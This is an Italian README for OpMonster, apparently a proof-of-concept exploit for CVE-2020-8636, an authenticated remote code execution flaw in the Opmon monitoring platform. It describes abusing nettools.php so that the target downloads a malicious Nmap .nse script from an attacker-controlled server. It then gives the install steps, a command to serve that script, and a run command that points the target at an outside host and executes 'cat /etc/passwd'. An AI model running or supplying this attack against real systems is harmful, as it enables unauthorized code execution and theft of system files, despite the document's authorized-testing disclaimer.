
CVE-2020-8636 exploit di esecuzione remota di codice autenticata per Opmon
Informazioni • Installazione • Utilizzo • Licenza
OpMonster è un exploit proof-of-concept per CVE-2020-8636, una vulnerabilità di
esecuzione remota di codice nella piattaforma di monitoraggio Opmon. Sfrutta
l'endpoint nettools.php, che consente di eseguire Nmap con opzioni --script
arbitrarie. L'exploit fa sì che Opmon scarichi uno script Nmap .nse dannoso da un
server sotto il tuo controllo (tramite http-fetch), lo depositi in /tmp, poi lo
esegua per lanciare il tuo comando sul target e ne stampi l'output.
Scoperto e sviluppato da @phor3nsic. Maggiori dettagli: Tre CVE su Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
Per prima cosa, avvia un server web su un host raggiungibile dal target, in una
directory da cui lo script .nse generato possa essere scaricato (l'exploit scrive
lo script nella directory corrente):
php -S 0.0.0.0:1337
Poi esegui l'exploit con quattro argomenti posizionali:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
L'exploit si interrompe con un messaggio se il target non scarica lo script ("not vulnerable", ovvero non vulnerabile) o non riesce a stabilire una connessione in uscita verso il tuo server.
Solo per test di sicurezza autorizzati e a scopo didattico. Sei responsabile dell'uso che ne fai.
| Argomento | Descrizione |
|---|
HOST | URL di base Opmon del target (es. https://vulnhost.com) |
LHOST | Host del tuo server che serve lo script .nse |
LPORT | Porta del tuo server |
CMD | Comando da eseguire sul target |